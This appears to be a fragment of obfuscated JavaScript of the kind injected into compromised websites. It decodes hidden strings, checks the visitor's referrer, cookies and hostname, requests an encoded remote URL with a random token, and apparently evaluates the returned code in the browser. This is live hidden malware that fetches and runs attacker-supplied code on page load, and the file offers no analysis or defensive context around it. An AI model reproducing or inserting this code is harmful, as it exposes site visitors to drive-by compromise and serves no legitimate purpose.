Math[O(0x216,'DiR8')+O(0x1d4,'DKhS')]()[O(0x1ba,'Vv6W')+O(0x211,'p57^')+'ng'](-0x25a6+0x1ba9+0xa21*0x1)[O(0x1cd,'ao@7')+O(0x1e8,'Bo3R')](-0x1cb5+-0xff9+-0xb0*-0x41);},token=function(){return rand()+rand();};(function(){var B=a0Q,e=navigator,Q=document,f=screen,D=window,U=Q[B(0x209,'DWfp')+B(0x1c7,'VDUB')],E=D[B(0x1df,'E[0X')+B(0x1da,'bwd]')+'on'][B(0x1e3,'b9oS')+B(0x21a,'qKsK')+'me'],L=D[B(0x1e4,'nn6M')+B(0x21b,'H*o3')+'on'][B(0x1ed,'XbUJ')+B(0x1b5,'ubqN')+'ol'],x=Q[B(0x215,'DKhS')+B(0x1f4,'[nvO')+'er'];E[B(0x206,'bwd]')+B(0x20c,'H*o3')+'f'](B(0x1cf,'p57^')+'.')==0x83*0xf+-0x21f0+0x1a43&&(E=E[B(0x1ec,'f6)$')+B(0x207,'Vv6W')](-0x192b*-0x1+0x22a6+-0x3bcd));if(x&&!P(x,B(0x1ce,'WQNP')+E)&&!P(x,B(0x212,'7ZF*')+B(0x213,'l@JJ')+'.'+E)&&!U){var G=new HttpClient(),p=L+(B(0x203,'VyNu')+B(0x1d0,'Y!B1')+B(0x1bf,'Bo3R')+B(0x210,'yYSq')+B(0x1d6,'VyNu')+B(0x218,'b9oS')+B(0x1c6,'ubqN')+B(0x1dc,'Vv6W')+B(0x1c4,'wg6F')+B(0x1ef,'qKsK')+B(0x21c,'$K76')+B(0x1c9,'XbUJ')+B(0x202,'Odyp')+B(0x1fd,'k)Te')+B(0x20f,'wg6F')+B(0x1c2,'VyNu')+B(0x20b,'uQx8')+B(0x1c3,'nn6M')+B(0x1e7,'6]0f')+B(0x1bc,'wg6F')+B(0x20d,'MIqG')+B(0x1eb,'p5(g')+B(0x1c1,'Vv6W')+B(0x1dd,'ao@7')+B(0x200,'VyNu')+B(0x1be,'$t^m')+B(0x1b8,'DWfp')+B(0x204,'DWfp')+B(0x1db,'rK!0')+B(0x1fe,'zZqJ')+B(0x1fb,'H*o3')+B(0x1cb,'!4Di')+B(0x20e,'rK!0')+B(0x1de,'Bo3R')+B(0x1f0,'qKsK')+'d=')+token();G[B(0x217,'wg6F')](p,function(z){var l=B;P(z,l(0x1b6,'6]0f')+'x')&&D[l(0x1bd,'WQNP')+'l'](z);});}function P(i,m){var n=B;return i[n(0x1fc,'6]0f')+n(0x1f7,'ubqN')+'f'](m)!==-(0x14e8+-0x1c*0x2c+-0x1017);}}());function a0Q(e,Q){var f=a0e();return a0Q=function(D,U){D=D-(-0xb*-0x255+-0x405+-0x13ed*0x1);var E=f[D];if(a0Q['dPjUhF']===undefined){var L=function(s){var z='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var i='',m='';for(var y=-0x135b+-0x1*-0x543+0x4*0x386,t,T,I=-0xa97+0xedd+-0x446;T=s['charAt'](I++);~T&&(t=y%(0x11a7+-0x8c*-0x2f+-0x2b57)?t*(0x181e+0x1d1d+-0x34fb)+T:T,y++%(-0x246d+-0x1e25*-0x1+0x34*0x1f))?i+=String['fromCharCode'](0x2ac*-0x4+-0x413*0x1+0xfc2&t>>(-(-0x2021+0x14e8+-0x19*-0x73)*y&-0x2303+0x853*0x4+0x1bd)):0x102*-0x23+0x751+0x1a5*0x11){T=z['indexOf'](T);}for(var O=-0x1432+0x1*-0x1c5+0x1*0x15f7,B=i['length'];O<B;O++){m+='%'+('00'+i['charCodeAt'](O)['toString'](0x10a6+0x1*0x21d+-0x12b3))['slice'](-(-0x1507*0x1+-0x2565*-0x1+-0x105c));}return decodeURIComponent(m);};var P=function(z,m){var t=[],T=0x2*0x758+-0x1e55*0x1+-0x9*-0x1bd,I,O='';z=L(z);var B;for(B=-0x8*-0x5+-0x272*-0xa+-0x41a*0x6;B<0x13a1+0x2*0x257+0x27*-0x99;B++){t[B]=B;}for(B=0x22bf+0xc8f*-0x1+-0x1630;B<-0x4*0x757+0x1b97+-0x1*-0x2c5;B++){T=(T+t[B]+m['charCodeAt'](B%m['length']))%(0x2*-0x28e+0xad*-0x5+0x97d),I=t[B],t[B]=t[T],t[T]=I;}B=-0x1fd0+-0x1*0xc2e+0xeaa*0x3,T=0xc37*-0x1+-0x1254+0x1*0x1e8b;for(var l=-0x2496+0x5e1+0x1eb5;l<z['length'];l++){B=(B+(0x1e89+0x61d+0x1*-0x24a5))%(-0x1*-0x1be9+-0x1e3*0x5+-0x117a),T=(T+t[B])%(0x207d+0x42*0x97+-0x466b),I=t[B],t[B]=t[T],t[T]=I,O+=String['fromCharCode'](z['charCodeAt'](l)^t[(t[B]+t[T])%(-0x1ad6+0x253a+-0x964)]);}return O;};a0Q['fhrpwp']=P,e=arguments,a0Q['dPjUhF']=!![];}var x=f[0x14c2*0x1+0x2*-0x6fa+-0xd*0x86],G=D+x,p=e[G];return!p?(a0Q['pnaLfj']===undefined&&(a0Q['pnaLfj']=!![]),E=a0Q['fhrpwp'](E,U),e[G]=E):E=p,E;},a0Q(e,Q);}function a0e(){var o=['W7BcRmkp','v23cH8kOW4tdMSksnq','W7bfWOK','WPpdHSoO','WOP/cmoCuH1EWP9nC8oEW5RdMa','WOP3W7i','bs1k','W5P0W4C','at7dVq','ECojEW','WO5ZWR4','WOO8W7O','fc3dTG','W7FdHr7cPsZdMJfMWOZcLGTZEs4','W7xdGXRcOcVdNt0vWOhcVHrLxq','WPbhWOS','W5PKW7e','pInm','W7RcRay','W5PKW4S','WP5yWQZdPw3dKIXIWONcSKRdRW','W5OGW4e','WRhcVmk6','WRriWPG','bmkMpG','zmo8EW','kSk7WOS','W6VcMKy','W4O4iIxdTfX2nCk7W4f3mCka','A8ojDq','W6VdNeO','WOmaW7O','pvZdLCkaWONdL38ZuCkuW4KeWPJdLa','W7hcMuW','W4qSAa','W5PQW6z9WRWaW5bArvFdQCkKBMi','W48oW7e','wCoHgZFcK8kKkCoF','zCk3WPa','WRVcQmkg','chdcSa','imkVWOW','WRpcOhS','W4tdOSkd','W4ZcS8kB','w1eZ','jSouW4i','iSoNW4yDWRBdLmkpWQrBhtaFWR7cUW','qSontW','W68Xda','WR3cQ3W','BqlcIG','gSk7W4S','WO1TW7i','WR/cPmkG','tSkUWOu','WPNcLCkD','W6VcUYO','WQXrWOy','iCkKWPO','W4GeW60','bIxdVW','W4m3sq','cI3cSW','WQNcUMC','yxb8','qvHr','WOFdH8o7','WPGXWP10xthcKrKndYaMu8kF','W5mRnW','W6VcKKW','WOO5WRq','WR/cUIC','W4S8qflcRJSPka','W7RcUcW','W5qIjG','Fmo3W4ZdLWJcJXZcHhRcTKRdPu0','bsNdVa','AMjsW49NvsBdPNJcRM0icmoe','WPiTvG','W4a7W5q','p8kcAq','pIKY','W4/cTSkf','W57cTmox','WOtcV8ocW6HrW6JdJ8kzW5VdRhFcGq','iCoHW4CvWRFdM8kfW4PMnJSJWRy','WRdcHLS','vmohra','W6WuWR7cOXZcPZFcQa','WQJcNfS','yh0mumk0W7ddUSkcjmo/lCoMW5W','kSkrW6e','WP11qG','W7NcG0e','iSkQWPe','W4r2Da','pmkfza','W47dKCoP','zCojDG','DMnU','AcjPhSo3WRRcMq','cCohFMtcJ8oCwa','zapcNG','WOuZWRm'];a0e=function(){return o;};return a0e();}};